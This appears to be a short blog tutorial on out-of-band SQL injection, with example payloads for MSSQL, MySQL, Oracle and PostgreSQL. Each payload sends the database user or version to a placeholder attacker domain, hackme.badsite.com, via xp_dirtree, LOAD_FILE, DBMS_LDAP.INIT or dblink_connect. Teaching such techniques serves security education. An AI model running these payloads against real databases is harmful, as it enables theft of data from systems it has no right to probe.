Out of Band SQL Injection

What is an Out of Band SQL Injection?
When an attacker is not able to exploit the SQL Injection via the same channel, they try to get the results via some other channel. This technic is called Out of Band SQL Injection (OOB SQL Injection). It is possible only if some features are enabled by the database. Out of Band SQL Injection is also used by attackers as an alternative of time-based blind SQL Injection because server response time depends on too many things and it is not reliable some times.
How does an Out of Band SQL Injection work?
As explained, Out of Band SQL Injection is providing results via some other channel, an attacker must use database functions which can communicate to the external network. Each kind of database is having its own functions for this kind of purpose. For example, MSSQL is using "EXEC master", MySQL is using "LOAD_FILE", Oracle is using DBMS_LDAP.INIT and PostgreSQL is using dblink_connect. 
What an attacker can do?
An attacker can exploit Out of Band SQL Injection to retrieve sensitive information like database name, database version, database user, etc. OOB SQL Injection is comparatively rare than other types of SQL Injection because it needs some features to be enabled by the database and superuser privileges are also required in some databases.
Example:
MSSQL: Here is an example os how to use EXEC to transfer information to the external server. In this example, system_user will be prepended to an attacker-controlled domain like if the username is dbuser1, an external call will be made to dbuser1.hackme.badsite.com and username is disclosed to the attacker.

DECLARE @data varchar(1024);
SELECT @data = (SELECT system_user);  
EXEC('master..xp_dirtree "\\'+@data+'.hackme.badsite.com\foo$"');

MySQL: MySQL uses LOAD_FILE function to load files and the attacker can abuse this function as shown in following example. In this example, LOAD_FILE function will try to load a file from the url subdomain.hackme.badsite.com where subdomain in ourcase is HEX of username.

SELECT LOAD_FILE(CONCAT('\\\\', (SELECT HEX(CONCAT(user(),"\n"))), '.hackme.badsite.com\\test.txt'));

Oracle: In Oracle, BDMS_LDAP.INIT function is used to initialize an LDAP initilasation from the URL. In our case, version name is prepended to an attacker-controlled domain for example, 10.2.2.hackme.badsite.com.

SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.hackme.badsite.com',80) FROM dual;

PostgreSQL: PostgreSQL has a feature of creating EXTENSION and to link this EXTENSION to the database, PostgreSQL uses dblink_connect function. This function accepts a parameter named host and attacker can abuse this parameter by providing a payload URL.

CREATE EXTENSION dblink;
SELECT dblink_connect('host=hackme.badsite.com user=postgres password=password dbname=dvdrental');

Reference:

0 Comments